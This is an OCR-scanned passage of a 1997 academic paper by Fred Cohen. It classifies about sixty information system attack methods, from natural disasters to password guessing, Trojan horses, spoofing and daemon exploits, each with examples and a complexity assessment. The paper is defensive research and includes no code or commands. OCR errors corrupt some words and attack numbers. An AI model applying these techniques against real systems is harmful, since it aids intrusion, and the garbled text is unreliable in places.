information system attacks: a preliminary classification scheme

18
Computers & Security, 16 (1997) 29-46 Information System Attacks: A Preliminary Classification Scheme Fred Cohen Sandia National Laboratories, PO Box 969, Livermore, CA 94551, USA This paper describes almost a hundred different classes of attack methods gathered from many different sources. Where a single source for a single item is available, it is cited in the text. The most comprehensive sources used are not cited throughout the text but rather listed here (Cohen, 1995 and Neumann, 1995). Other major sources not identified by specific citation are listed here (Bellovin, 1989, 1992; Bishop, 1996; Cheswick, 1994; Cohen, 1991, 1994b; Denning, 1982; Feustal, 1973; Hoffman, 1990, Knight, 1978; Lampson, 1973; Landwehr, 1983; Linde, 1975; Neumann, 1989; Spafford, 1992). Background For some time, people who work in information protection have been considering and analyzing vari- ous types of attacks and defences. Several authors have published partial lists of attack techniques, but none have been very complete. In trying to do comprehen- sive analysis of the techniques that may apply to a particular system, many people have found them- selves looking through the many reference works time and again to assure, to a reasonable degree, that their coverage was fairly comprehensive. That is the reason this paper was written. This paper is a first cut at putting all of the methods of attack into a classification scheme and co-locating them with each other so that knowledgeable experts can do a thorough job of considering possible attacks without having to look at numerous reference arti- cles, and so that those who wish to gain expertise will have a starting point for their investigation. In addition to the list of methods, it was decided to add examples of each method - hopefully to instill clarity - and to provide an initial assessment of the complexity issues involved in these attack methods. This has proven most helpful in explaining to many people who think that the protection task is easy or straight forward, just how hard the issues we face are and how little has really been done to address them. The best result that could come out of this paper would be for the readers to point out all of its flaws and imperfections - by providing more attack meth- ods so the list can be expanded, by identifying related results so that the true complexity of these issues can be formally determined and citations to other refer- ence works can be added, by helping to provide improved examples, and by suggestions for ways to make this classification scheme more comprehensive, more widely accepted, and more valuable to the in- formation protection research community. 0167-4048/97/W 7.00 0 1997, Elsevier Science Ltd 29

Upload: fred-cohen

Post on 02-Jul-2016

231 views

Category:

Documents


0 download

TRANSCRIPT

Page 1: Information system attacks: A preliminary classification scheme

Computers & Security, 16 (1997) 29-46

Information System Attacks: A Preliminary Classification Scheme Fred Cohen Sandia National Laboratories, PO Box 969, Livermore, CA 94551, USA

This paper describes almost a hundred different classes of attack methods gathered from many different sources. Where a single source for a single item is available, it is cited in the text. The most comprehensive sources used are not cited throughout the text but rather listed here (Cohen, 1995 and Neumann, 1995). Other major sources not identified by specific citation are listed here (Bellovin, 1989, 1992; Bishop, 1996; Cheswick, 1994; Cohen, 1991, 1994b; Denning, 1982; Feustal, 1973; Hoffman, 1990, Knight, 1978; Lampson, 1973; Landwehr, 1983; Linde, 1975; Neumann, 1989; Spafford, 1992).

Background For some time, people who work in information protection have been considering and analyzing vari- ous types of attacks and defences. Several authors have published partial lists of attack techniques, but none have been very complete. In trying to do comprehen- sive analysis of the techniques that may apply to a particular system, many people have found them- selves looking through the many reference works time and again to assure, to a reasonable degree, that their coverage was fairly comprehensive. That is the reason this paper was written.

This paper is a first cut at putting all of the methods of attack into a classification scheme and co-locating

them with each other so that knowledgeable experts can do a thorough job of considering possible attacks without having to look at numerous reference arti- cles, and so that those who wish to gain expertise will have a starting point for their investigation.

In addition to the list of methods, it was decided to add examples of each method - hopefully to instill clarity - and to provide an initial assessment of the complexity issues involved in these attack methods. This has proven most helpful in explaining to many people who think that the protection task is easy or straight forward, just how hard the issues we face are and how little has really been done to address them.

The best result that could come out of this paper would be for the readers to point out all of its flaws and imperfections - by providing more attack meth- ods so the list can be expanded, by identifying related results so that the true complexity of these issues can be formally determined and citations to other refer- ence works can be added, by helping to provide improved examples, and by suggestions for ways to make this classification scheme more comprehensive, more widely accepted, and more valuable to the in- formation protection research community.

0167-4048/97/W 7.00 0 1997, Elsevier Science Ltd 29

Page 2: Information system attacks: A preliminary classification scheme

Large Information System Attack Methods: A Preliminary Classification Scheme/Fred Cohen

Properties In writing this paper, the intent was to provide more comprehensive coverage than was previously avail- able. Along the way, we noticed several properties of the methods of attack:

Property 1: non-orthugonufity. The classes described by this classification scheme are not orthagonal. For ex- ample, a virus may also be a Trojan horse, may contain a time bomb, and may exploit a privileged program to do damage. This property makes analyzing the space as a whole quite difficult.

Property2 synergistic. The classes described herein have synergisms so that standard statistical techniques may not be effective in analyzing them. For example, if two attacks are each 90% effective this does not mean that when combined they become 99% effective -when combined they may become 0% effective, while two defences that are 90% effective may also not be 99% effective when combined and may even hinder each others’ performance. Synergistic effects are not yet understood fully in this context, however, this makes analysis of attack and defence quite complex and may make optimization impossible until synergies are bet- ter understood.

Property 3: non-specijcity. The classes described are, for the most part, non-specific to an architecture or situ- ation. Actual attacks and defences, however, are quite specific, and the devil -as they say- is in the details. In some classes (for example viruses) there are more than 10 000 distinct examples known to exist. The broadness ofthese classes makes them each a substan- tial area of research.

Property 4: desmptive only. The classes described here are described descriptively and - with a few notable exceptions - have not been thoroughly analyzed or even defined in a mathematical sense. Except in those few cases where mathematics has been developed, it is hard to even characterize the issues underlying these classes, much less attempt to provide compre- hensive understandings.

Property 5: limited applicability. Each class described here may or may not be applicable in or to any particular situation. While threat profiles and histori- cal information may lead us to believe that certain items are more or less important or interesting, there

is no scientific basis today for believing that any of these classes should or should not be considered in any given circumstance. This sort of judgement is made today entirely on the basis of a judgement call by decision makers. Despite this general property, in most cases, analysis is possible and produces reason- ably reliable results over a reasonably short time frame.

Property 6: incompleteness. The classes given here are almost certainly incomplete in covering the possible or even realized attacks and defences. This is entirely due to the author’s and/or reviewers’ lack of compre- hensive understanding at this time. We can only form a complete system by completely characterizing these issues in a mathematical form - something nobody has even approached doing to date.

Attack Methods Attack 2: errors and omissions. Erroneous entries or missed entries by designers, implementer, maintain- ers, administrators, and/or users create vulnerabilities exploited by attackers. Examples include forgetting to eliminate default accounts and passwords when in- stalling a system, incorrectly setting protections on network services, and a wide range of other minor mistakes that can lead to disaster. There appear to be an unlimited (finite but unbounded) number of pos- sible errors and omissions in general purpose systems. Special-purpose systems may be more constrained.

Attack 2: power&lure. Failure of electrical power causes computer and peripheral failures leading to loss of availability, sometimes requiring emergency response, and otherwise disrupting normal opera- tions (Winkelman, 1995; Agudo, 1996; NSTAC, 1996; Dagle, 1996). Power failure is not usually a complex issue to address, although the underlying causes may be.

Attack 3: cable cuts. A cable is cut resulting in disrupted communications, usually requiring emergency re- sponse, and otherwise disrupting normal operations. The general issue of cable cutting is quite complex and appears to involve solving many large min-cut problems.

Attack 4:fire. A fire occurs causing physical damage and permanent as well as temporary faults, requiring

30

Page 3: Information system attacks: A preliminary classification scheme

Computers & Security, Vol. 16, No. 1

emergency response, and otherwise disrupting nor- mal operations. The fire issue is not normally a very complex one.

Attack 5:flood. A flood occurs causing physical damage and permanent as well as temporary faults, requiring emergency response, and otherwise disrupting nor- mal operations. Although floods are generally considered relatively simple issues to address, their are occasionally somewhat more complex flooding issues than are anticipated.

Attack 6: earth movement. The Earth moves causing physical damage and permanent as well as temporary faults, requiring emergency response, and otherwise disrupting normal operations. Statistical techniques and historical data appear to be quite sufficient to analyze Earth movement.

Attack 7: s&_/lures. Changes on the surface of the sun cause excessive amounts of radiation to be delivered, typically resulting in noise bursts on radio communi- cations, disrupted communications, and other changed physical conditions. Statistical techniques and historical data appear to be quite sufficient to analyze solar flares.

Attack 8: vokcunos. A volcano erupts causing physical damage and permanent as well as temporary faults, requiring emergency response, and otherwise dis- rupting normal operations. Statistical techniques and historical data appear to be quite sufficient to analyze volcanos.

Attack 9: severe weather. Severe weather conditions (e.g. hurricane, tornado, winter storm) occur causing physical damage and permanent as well as temporary faults, requiring emergency response, and otherwise disrupting normal operations. Statistical techniques and historical data appear to be quite sufficient to analyze severe weather.

Attack 20: static. Static electricity builds up on surfaces and causes transient or permanent failures in compo- nents. The static issue is not normally a very complex one.

Attack 11: environmental control loss. Environmental controls required to maintain proper operating con- ditions for equipment fails causing disruption of services. Examples causes include air conditioning

failures, heating failures, temperature cycling, smoke, dust, vibration, corrosion, gases, fumes, chemicals. Statistical techniques and historical data appear to be quite sufficient to analyze environmental control losses in most cases.

Attack 12: relocation. Relocation of equipment causes physical harm to equipment and different exposures of equipment to physical and environmental vulner- abilities. Statistical techniques and historical data appear to be quite sufficient to analyze relocation.

Attack 13: system maintenance. System maintenance causes period of time when systems operate differ- ently than normal and may result in temporary or permanent inappropriate or unsafe configurations. Maintenance can also be exploited by attackers to create forgeries of sites being maintained, to exploit temporary openings in systems created by the main- tenance process, or other similar purposes. Maintenance can accidentally result in the introduc- tion of viruses, by leaving improper settings, and by other similar accidental events. Statistical techniques and historical data appear to be quite sufficient to analyze system maintenance.

Attack 24: testing. Testing stresses systems inducing a period of time when systems operate differently than normal and may result in temporary or permanent inappropriate or unsafe configurations. Testing issues are quite complex, and some well-known testing problems are exponential in time and space. Much of the current analysis of protection testing is based on naive assumptions.

Attack 1.5: inadequate maintenance. Inadequate mainte- nance results in uncovered failures over extended periods of time, possibly inducing a period of time when systems operate differently than normal and may result in temporary or permanent inappropriate or unsafe configurations. Statistical techniques and historical data appear to be quite sufficient to analyze maintenance adequacy

Attack 16: Trojan horses. Unintended components or operations are placed in hardware, firmware, soft- ware, or wetware causing unintended and/or inappropriate behaviour. Examples include time bombs, use or condition bombs, flawed integrated circuits, additional components on boards, additional instructions in memory, operating system modifica-

31

Page 4: Information system attacks: A preliminary classification scheme

Large Information System Attack Methods: A Preliminary Classification Scheme/Fred Cohen

tions, name overloaded programs placed in an execu- tion path, added or modified circuitry, mechanical components, f 1 a se connectors, false panels, radios placed in network connectors, displays, wires, or other similar components. Detecting Trojan horses is almost certainly an undecidable problem (although nobody has apparently proven this it seems clear) but inadequate mathematical analysis has been done in this subject to provide further clarification.

Attack 17: dumpster diving. Waste product is examined to find information that might be helpful to the at- tacker. Statistical techniques and historical data appear to be quite sufficient to analyze dumpster diving.

Attack 18:fictitiouspeople. Impersonations or false iden- tities are used to bypass controls, manage perception, or create conditions amenable to attack. Examples include spies, impersonators, network personae, fic- tional callers, and many other false and misleading identity-based methods. This appears to be a very complex social, political, and analytical issue that is nowhere near being solved.

Attack 19: protection mis-setting exploitation. Mis-set pro- tections on files, directories, systems, or components are exploited to examine, modi@, delete, or otherwise disrupt normal operation. Setting protections prop- erly is not a trivial matter, but there are linear time algorithms for automating settings once there is a decision procedure in place to determine what values to set protection to. No substantial mathematical analysis has been published in this area and no results have been published for the complexity of building a decision procedure, however, it is known that, under some conditions, it is impossible to have settings that both provide all appropriate access and deny all inap- propriate access (Cohen, 1991). It is known to be undecidable for a general purpose subject/object sys- tem whether a given subject will eventually gain any particular right over any particular object (Harrison, 1976).

Attack 20: resource availability manipulation. Resources are manipulated so as to make functions requiring those resources operate differently than normal. Ex- amples include E-mail overflow used to disrupt system operation (Cohen, 1993), file handle con- sumption used to prevent audits from operating (Cohen, 1991) and overloading unobservable net- work paths to force communications to use

observable paths. Most of the issues with resource availability result from the high cost of making worst- case resources available. As a result, a tradeoff is made in the design of systems that assures that under some (hopefully unlikely) conditions resources will be ex- hausted while providing a suitably high likelihood of availability under almost all realistic situations. The general complexity involved with most resource allo- cation problems in which limited resources are available is at least NP-complete.

Attack 21: perception management a.k.a. human engineer- ing. Causing people to believe things that forward the goal. Examples include tricking a person into giving you their password or changing their password to a particular value for a period of time, talking your way into a facility, and causing people to believe in relig- ious doctrine in order to get them to behave as desired. This has been a security issue since the be- ginning of time and appears to be a very complex human, social, political, and legal issue. No substan- tial progress has been made to date in resolving this issue.

Attack 22: spoofing and masquerading. Creating false or misleading information in order to fool a person or system into granting access or information not nor- mally available. Examples include operator spoofing to trick the operator into making an error or giving away a password, location spoofing to trick a person or system into believing a false location, login spoof- ing which creates a fictitious login screen to get users to provide identification and authentication informa- tion, E-mail spoofingwhich forges E-mail to generate desired results, and time spoofing which creates false impressions of relative or absolute time in order to gain advantage. Although no deep mathematical analysis of this area has been published to date, it appears that this issue does not involve any difficult mathematical limitations. Limited results in provid- ing secure channels have indicated that such a process is not complex but that it may depend on crypto- graphic techniques in some cases, which lead to substantial mathematical issues.

Attack 23: infrastructure interference. Interfering with in- frastructure so as to disrupt services and/or redirect activities. Examples include creating an accident on a particular road at a particular place and time in order to cause a shipment to be rerouted through a check-

32

Page 5: Information system attacks: A preliminary classification scheme

Computers & Security, Vol. 16, No. I

point where components are changed, taking down electrical power in order to deny information services, modifying a domain name server on the Internet in order to alter the path through which information flows from point to point, and cutting a phone line in order to sever communications. Although no mathe- matical analysis has been published on this issue to date, it appears that analyzing infrastructure interfer- ence is quite complex and involves analysis of all of the infrastructure dependencies if the attack is to be directed and controlled. Similarly, the detection and countering of such an attack appears to be quite com- plex. It would appear that this is at least as complex as solving multiple large min-cut problems. Some initial analysis of US information infrastructure depend- encies has been done and has led to a report of about 1000 pages which only begins to touch the surface of the issue (SAIC-Iw, 19).

Attack 24: infrartnrcture observation. Examining the in- frastructure in order to gain information. Examples include watching air ticketing information in order to see when particular people go to particular places and using this as an intelligence indicator, tapping a PBX system in order to record key telephone conversa- tions, and watching for passwords on the Internet in order to gain identification and authentication infor- mation to multiple computers. Except in cases where cryptography, spread spectrum, or other similar tech- nology is used to defend against such an attack, it appears that infrastructure observation is simple to accomplish and expensive to detect. No mathematical analysis has been published to date.

Attack 25: insertion in transit. Insertion of information in transit so as to forge desired communications. Examples include adding transactions to a transaction sequence, insertion of routing information packets so as to reroute information flow, and insertion of ship- ping address information to replace an otherwise defaulted value. Although there appears to be a wide- spread belief that insertion in transit is very difficult, in most cases it is technically straight forward. Com- plexity only arises when defensive measures are put in place to detect or prevent this sort of attack.

Attack 26: observation in transit. Examination of infor- mation in transit so as to gain information. Examples include telephone tapping, network tapping, and I/O buffer watching. Except in cases where cryptography,

spread spectrum, or other similar technology is used to defend against such an attack, it appears that obser- vation in transit over physically insecure communications media is simple to accomplish and expensive to detect. In cases where the media is se- cured (e.g. inter-process communication within a single processor under a secure operating system) some method of getting around any system-level protection is also required.

Attack 27: mod&ztion in transit. Modification of infor- mation in transit so as to modify communications as desired. Examples include removing end-of-session requests and providing suitable replies, then taking over the unterminated communications link, modi- fication of an amount in an electronic funds transfer request, and rewriting Web pages so as to reroute subsequent traffic through the attacker’s site. Modi- fication in transit is roughly equivalent in complexity to the combination of observation in transit and in- sertion in transit, however, because of the real-time requirements for some sorts of modification in tran- sit, the difficulty of successful attack may be significantly increased.

Attack 28: sympathetic vibration. Creating or exploiting positive feedback loops or underdamped oscillatory behaviours so as to overload a system. Examples in- clude electrical or acoustic wave enhancement, the creation ofpackets in the Internet which form infinite communications loops, and protocol errors causing cascade failures in telephone systems. In some under- damped systems, sympathetic vibration is easily induced. It sometimes even happens accidentally In over-damped systems, sympathetic vibration requires additional energy. In logical systems - such as pro- tocol driven networks - the complexity of finding an oscillatory behaviour is often very low. A simple search of the Internet protocols leads to several such cases. More generally, finding such cases may involve N-fold combinations of protocol elements which is exponential in time and linear in space. Proving that protocols are free of such behaviours is known to be at least NP-complete (Bochmann, 1977; Danthine, 1982; Hailpern, 1983; Merlin, 1979; Palmer, 1986; Sabnani, 1985; Sarikaya, 1982; Sunshine, 1979).

Attack 29: cascadefailures. Design flaws in tightly cou- pled systems that cause error recovery procedures to induce further errors under select conditions. Exam-

33

Page 6: Information system attacks: A preliminary classification scheme

Large Information System Attack Methods: A Preliminary Classification Scheme/Fred Cohen

ples include the electrical cascade failures in the US power grid (WSCC, 1996), telephone system cascade failures causing widespread long distance service out- ages (Pekarske, 1990) and inter-system cascades such as power failures bringing down telephone switches required to bring back up power stations. Only cur- sory examination of select cascade failures has been completed, but initial indications are that the com- plexity of creating a cascade failure varies with the situation. In systems operating at or near capacity, cascade failures are easily induced and must be ac- tively prevented or they occur accidentally (WSCC, 1996). As systems move further away from being tightly coupled and near capacity, cascade failures become for more difficult to accomplish. No general mathematical results have been published to date, but it appears that analyzing cascade failures is at least as complex as fully analyzing the networks in which the cascades are to be created, and this is known for many different sorts of networks.

Attack 30: bribes and extortion. Promises or threats that cause trusted parties to violate their trust. Examples include bribing a guard to gain entry into a building, kidnapping a key employee’s family member to gain access to a computer system, and using sexually ex- plicit photographs to convince a trusted employee to provide insider information. This issue is as complex as the general problem of insider attacks. It appears to be uncharacterizable mathematically, but may be modelled by statistical techniques.

Attack 31:get ajob. An attacker gets a job in order to gain insider access to a facility Examples include getting a maintenance job by under-bidding oppo- nents and then stealing and selling inside information to make up for the cost difference, the planting of spies in intelligence agencies of competitors, and other similar sorts of moles. This issue is as complex as the general problem of insider attacks. It appears to be uncharacterizable mathematically, but may be modelled by statistical techniques.

Attack 32: password guessing. Sequences of passwords are tried against a system or password repository in order to find a valid authentication. Examples include running the program ‘crack’ on a stolen password file, guessing passwords on network routers and PBX switches, and using well-known maintenance pass- words to try to gain entry Password guessing has been

analyzed in painstaking detail by many researchers. In general, the problem is as hard as guessing a string from a language chosen by an imperfect random number generator (Cohen, 1985). The complexity of attack depends on the statistical properties of the generator. For most human languages there are about 1.2 bits of information per symbol (Shannon, 1949), so for an eight-symbol password we would expect about 9.8 bits of information and thus an average of about 500 guesses before success. Similarly, at two attempts per user name (many systems use threshold of three bad guesses before reporting an anomaly) we would expect entry once every 250 users. For eight- symbol passwords chosen uniformly and at random from an alphabet of 100 symbols, 5 quadrillion guesses would be required on average.

Attack 33: invalid values on calls. Invalid values are used to cause unanticipated behaviour. Examples include system calls with pointer values leading to unauthor- ized memory areas and requests for data from databases using system escape characters to cause interprocess communications to operate improperly In most cases, only a few hundred well-considered attempts are required to find a successful attack of this sort against a program. No mathematical theory exists for analyzing this in more detail, but a reasonable suspicion would be that several hundred common failings make up the vast majority of this class of attacks and that those sorts of flaws could be system- atically attempted. There is some speculation that software testing techniques (Lyu, 1995) could be used to discover such flaws, but no definitive results have been published to date.

Attack 34: undocumented or unknownfirnction exploitation. Functions not included in the documentation or un- known to the system owners or operators are exploited to perform undesirable actions. Examples include back doors placed in systems to facilitate maintenance, undocumented system calls commonly inserted by vendors to enable special functions result- ing in economic or other market advantages, and program sequences accessible in unusual ways as a result of improperly terminated conditionals. Back- doors and other intentional functions are normally either known or not known. If they are known, the attack takes little or no effort. Finding back-doors is probably, in general, as hard as demonstrating pro- gram correctness or similar problems that are at least

34

Page 7: Information system attacks: A preliminary classification scheme

Computers & Security, Vol. 16, No. I

NP-complete and may be nearly exponential depend- ing on what has to be shown. There is some speculation that decision and data flow analysis might lead to the detection of such functions, but no defini- tive results have been published to date.

Attack 3.5: inadequate n&e exploitation. Lack of adequate notice is used as an excuse to do things that notice would normally have prohibited or warned against. Examples include unprosecutable entry via normally unused services, password guessing through an inter- face not providing notice, and Web server attacks which bypass any notice provided on the home page. Notice is trivially demonstrated to be given or not given depending on the method entry. The most effective overall protection from this sort of exploit would be the change of laws regarding certain classes of attacks.

Attack 36: excessprivilege exploitation. A program, device, or person is granted privileges not strictly required in order to perform their function and the excess privi- lege is exploited to gain further privilege or otherwise attack the system. Examples include Unix-based SetUID programs granted root access exploited to grant attackers unlimited access, access to unauthor- ized need-to-know information by a systems administrator granted too-flexible maintenance ac- cess to a network control switch, and user-programmable DMA devices reprogrammed to access normally unauthorized portions of memory. Determining whether a privileged program grants excessive capabilities to an attacker appears, in general, to be as hard as proving program correctness, which is at least NP-complete and may be nearly exponential depending on what has to be shown. Determining what privileges a program should be granted and has been granted may be somewhat easier but no substan- tial analysis of this problem has been published to date.

Attack 37: environment cornrption. The computing envi- ronment upon which programs or people depend for proper operation is corrupted so as to cause those other programs to operate incorrectly. Examples in- clude manipulating the Unix FS environment variable so as to cause command interpretation to operate unusually, altering the PATH (or similar) variable in multi-user systems to cause unintended programs to be used, and manipulation of a paper

form so as to change its function without alerting the person filling it out. In most computing environ- ments, there are only a relatively small number of ways that environment variables get set or used. This limits the search for such vulnerabilities substantially, however, the ways in which environmental variables might be used by programs in general is unlimited. Thus the theoretical complexity of identifying all such problems would likely be at least NP-complete. This would seem to give computational leverage to the attacker.

Attack 38: device access exploitation. Access to a device is exploited to alter its function or cause its function to be used in unanticipated ways. Examples include removing shielding from a wire so as to cause more easily received electromagnetic emanations, repro- gramming a bus device to deny services at a hardware level, and altering microcode so as to associate at- tacker-defined hardware functions with otherwise unused operation codes. Since hardware devices are, in general, at least as complex as software devices, the complexity of detecting such a flaw would appear to be at least NP-complete. Injecting such a flaw, on the other hand, appears to be quite simple-given physi- cal access to a device.

Attack 39: modelling mismatches. Mismatches between models and the realities they are intended to model cause the models to break down in ways exploitable by attackers. Examples include use of the Bell-La- Padula model of security (Bell, 1973) as a basis for designing secure operating systems - thus leaving disruption uncovered, modelling attacks and de- fences as if they were statistically independent phenomena for risk analysis - thus ignoring syner- gistic effects, and modelling misconfigurations as mis-set protection bits - when the content of con- figuration files remains uncovered. There is some theory about the adequacy of modelling, however, there is no general theory that addresses the protec- tion-related issues of modelling flaws. This appears to be a very complex issue.

Attack 40: simultaneous access exploitations. Two or more simultaneous or split multi-part access attempts are made, resulting in an improper decision or loss of audit information. Examples include the use of large numbers of access attempts over a short period of time so as to cause grant/refuse decision software to

35

Page 8: Information system attacks: A preliminary classification scheme

Large Information System Attack Methods: A Preliminary Classification Scheme/Fred Cohen

act in a previously unanticipated and untested fashion, the execution of sequences of operations required for system takeover by multiple user identities, and the holding of a resource required for some other func- tion to proceed so as to deny completion of that service. This problem has been analyzed in a cursory fashion and the number of possible sequences of events appears to be factorial in the combined lengths of the programs coexisting in the environment (Co- hen, 1994~). Clearly a full analysis is infeasible for even simplistic situations. It is closely related to the interrupt sequence mishandling problem.

Attack 41: implied trust exploitation. Programs operating in a shared environment inappropriately trust the information supplied to them by untrustworthy pro- grams. Examples include forged data from Domain Name Servers in the Internet used to reroute infor- mation through attackers, forged replies from authentication daemons causing untrusted software to be run by access control software, forged Network Information Service packets causing wrong password entries to be used in authenticating attackers, and network-based administration programs that can be fooled into forwarding incorrect administrative con- trols. In general, analyzing this problem would seem to require analyzing all of the interdependencies of programs. In today’s networked environment, this would appear to be infeasible, but no detailed analysis has been published to date.

Attack 42: interrupt sequence mishandling. Unanticipated or incorrectly handled interrupt sequences cause sys- tem operation to be altered unpredictably Examples include stack frame errors induced by incorrect inter- rupt handling, the incorrect swapping out of the swapping daemon on unanticipated conditions, and denial of services resulting from improper prioritiza- tion of interrupts. This problem has been analyzed in a cursory fashion and the number of possible se- quences of events appears to be factorial in the combined lengths of the programs coexisting in the environment (Voas, 1993). Clearly a full analysis is infeasible for even simplistic situations. It is closely related to the simultaneous access exploitation prob- lem.

Attack 43: emergency procedure exploitation. An emer- gency condition is induced resulting in behavioural changes that reduce or alter protection to the advan-

tage of the attacker. Examples include fires, during which access restrictions are often changed or less rigorously enforced, power failures during which many automated alarm and control systems fail in a safe mode with respect to some - possibly exploit- able - criteria, and computer incident response during which systems administrators commonly de- viate - perhaps exploitably - from their normal behavioural patterns. In most cases, emergency pro- cedures bypass many normal controls, and thus many attacks are granted during an emergency that would be far more difficult during normal operations. No complexity measure has been made of this phenom- ena to date.

Attack 44: desychronization and time-based attacks. Sys- tems that depend on synchronization are desynchronized causing them to fail or operate im- properly Examples include DCE servers that may deny services network-wide when caused to become desynchronized beyond some threshold, crypto- graphic systems which, once desynchronized may take a substantial amount of time to resynchronize, automated software and systems maintenance tools which may make complex decisions based on slight time differences, and time-based locks which may be caused to open or close at the wrong times. This problem appears to be similar in complexity to the interrupt sequence mishandling problem (Voas, 1993). It appears, in general, to be factorial in the number of time-based decisions made in a system, however, their may be substantial results in the field of communicating sequential processes that lead to far simpler solutions for large subclasses.

Attack 45: imperfect daemon exploits. Daemon programs designed to provide privileged services upon request have imperfections that are exploited to provide privi- leges to the attacker. Examples include Web, Gopher, Sendmail, FTP TFTP, and other server daemons exploited to gain access to the server from over a network, internal use only daemons such as the Unix cron facility exploited to gain root privileges by oth- erwise unprivileged users, and automated backup and recovery daemons exploited to overwrite current ver- sions of programs with previous - more vulnerable - versions. In general, this problem is at least as complex as proving program correctness, which is at least NP-complete and may be nearly exponential depending on what has to be shown. Only a few

36

Page 9: Information system attacks: A preliminary classification scheme

Computers & Security, Vol. 16, No. I

daemons have ever been shown to avoid large subsets of these exploits (Cohen, 1997) and those daemons are not widely used.

Attack 46: multiple error inducement. The introduction of multiple errors is used to cause otherwise reliable software to fail in unanticipated ways. Examples in- clude the creation of an input syntax error with a previously locked error-log file resulting in inconsis- tent data state, the premature termination of a communications protocol during an error recovery process - possible causing a cascade failure, and the introduction of simultaneous interleaved attack se- quences causing normal detection methods to fail (Hecht, 1993; Thyfault, 1992). The limited work on multiple error effects indicates that even the most well-designed and trusted system fail unpredictably under multiple error conditions. This problem ap- pears to be even more complex than proving program correctness, perhaps even falling into the factorial time and space realm. For an attacker, producing multiple errors is often straightforward, but for a defender to analyze them all is essentially impossible under current theory

Attack 47: viruses. Programs that reproduce and possi- bly evolve. Examples include the 11000 or so known viruses, custom file viruses designed to act against specific targets, and process viruses that cause denial of service or thrashing within a single system. Virus detection has been proven to be undecidable in the general case (Cohen, 1984, 1986). Viruses are also trivial to write and highly effective against most mod- ern systems.

Attack 48: data diddling. Modification of data through unauthorized means. Examples include non-database manipulation of database files accessible to all users, modification of configuration files used to setup fur- ther machines, and modification of data residing in temporary files such as intermediate files created dur- ing compilation by most compilers. Data diddling is a relatively simple task. If the data is writable, it can be easily diddled, and if it is not writable, diddling is impossible until this condition changes.

Attack 49: van Eck bugging. Electromagnetic emana- tions are observed from afar. Examples include the tapping of Scotland Yard by a reporter to demonstrate a $100 remote tapping device and observed emana- tions from financial institutions indicative of pending

trades. van Eck bugging is relatively easy to do and requires only cursory knowledge of electronics and antennae theory (van Eck, 1985).

Attack 50: electronic interference. Jamming signals are introduced to cause failures in electronic communi- cations systems. Examples include the method and apparatus for altering a region in Earth atmosphere, ionosphere, and/or magnetosphere, and common ra- dio jamming techniques. Simplistic jamming is straight forward, however, power efficient jamming is necessary in order to have good effect against spread spectrum and similar anti-jamming systems, and this is somewhat more complex top achieve.

Attack 52: PBX bugging. Point Branch exchanges or similar switching centres are attacked in order to exploit weaknesses in their design allowing connected telephone instruments to be tapped. Examples in- clude on-hook bugging of hand-held instruments, open microphone listening, and exploitation of silent conference calling features. In cases where functions that support bugging are provided by the PBX, this attack is straight forward. In cases where no such function is provided, it is essentially impossible. De- termining which is the case is non-trivial in general, but in practice it is usually straightforward.

Attack 52: audio/video viewing. Audio and video input devices connected to computers for multi-media ap- plications are exploited to allow attackers to look at and listen to events at remote locations. Examples include most versions of video and audio equipment currently connected to multi-media workstations and some video-phone systems. Audio and video viewing attacks normally depend on breaking into the operat- ing system and then enabling a built-in function. The complexity lies primarily in breaking into the system and not in turning on the viewing function.

Attack 53: repair-replace-remove information. Repair processes are exploited to extract, modify, or destroy information. Examples include computer repair shops copying information and reselling it and main- tenance people introducing computer viruses. This attack requires involvement in the repair process and is normally not directed at a particular victim from its inception but rather directed toward an audience (market segment). There is little complexity involved in carrying out the attack once the position as a repair provider is established.

37

Page 10: Information system attacks: A preliminary classification scheme

Large Information System Attack Methods: A Preliminary Classification Scheme/Fred Cohen

Attack 54: wire closet attacks. Break into the wire closet and alter the physical or logical network so as to grant, deny, or alter access. Examples include wire tapping techniques, malicious destruction of wiring causing service disruption, and the introduction of video tape players into surveillance channels to hide physical access. Wire closet attacks require only technology knowledge, access to the wire closet, and a goal. The complexity of finding the proper circuits to attack is normally within the knowledge level of a telephone service person or other wire-person.

Attack 55: shoulder surfing. Watching over peoples’ shoulders as they use information or information systems. Examples include watching people as they enter their passwords, watching air travellers as they use their computers and review documents while in flight, and observing users in normal operations to understand standard operating procedures. This is a trivial attack to carry out.

Attack 56: data aggregation. Legitimately accessible data is aggregated to derive unauthorized information. Examples include getting the total departmental sal- ary figures just before and after a new employee is hired to derive the salary of the new hire, attending a wide range of unclassified but private meetings in a particular area in order to gain an overall picture of what work a group is doing, and tracking movements of many people from a particular organization and correlating that information with job titles and other events to derive intelligence indicators. Data aggrega- tion can be quite complex both to perform and to protect against. Some work on protecting against these attacks has led to identifying NP-complete problems, while gathering information through this technique may involve solving a large number of equations in a large number of unknowns and is similar to integer programming problems in com- plexity

Attack 57:process bypassing. Bypassing a normal process in order to gain advantage. Examples include retail returns department employees entering false return data in order to generate refund checks, use of com- puter networks to generate additional checks after the legitimate checks have passed the last integrity checks, and altering pricing records to reflect false inventory levels to cover up thefts. This attack is often accom- plished by a relatively unsophisticated attacker using

only knowledge gained while on the job. The com- plexity of many such attacks is low, however, in the general case it may be quite difficult to assure that no such attacks exist without a particular level of collu- sion. Not formal analysis has been published to date.

Attuck 58: content-bused attacks. The content sent to an interpretive mechanism causes that mechanism to act inappropriately Examples include Web-based URLs that bypass firewalls by causing the browser within the firewall to launch attacks against other inside systems, macros written in spreadsheet or word proc- essing languages that cause those programs to perform malicious acts, and compressed archives that contain files with name clashes causing key system files to be overwritten when the archive is decom- pressed. Many content-based attacks are quite simple or are easily derived from published information. They tend to be quick to operate and simple to pro- gram. More sophisticated attacks exploiting a content-based flaw may require far more attackprow- ess. No mathematical analysis has been published of this class of attacks to date.

Attack 59: backup thef corruption, or destruction. Backups protected less comprehensively than on-line copies of information are attacked. Examples include the place- ment of magnetic devices in backup storage areas in order to erase or corrupt magnetic backups, the infec- tion of backup media by computer viruses, and the theft of backup media being disposed near the end of its life cycle. Except in cases where backup informa- tion is encrypted, back-up attacks are straightforward and introduce little complexity In the case of aging backup tapes some signal processing capabilities may be required in order to reliably read sections of media, but this is not very complex or expensive.

Attack 60: restoration process corruption or misuse. The process used to restore information from backup tapes is corrupted or misused to the attackers advan- tage. Examples include the creation of fake backups containing false information, alteration of tape head alignments so that restoration fails, and the use of privileged restoration programs to grant privilege by restoring protection settings or ownerships to the wrong information. Creating fake backups may be complicated by having to reproduce much of what is present on actual backups on the particular site, by having to create CRC codes for replaced components

38

Page 11: Information system attacks: A preliminary classification scheme

Computers & Security, Vol. 16, No. I

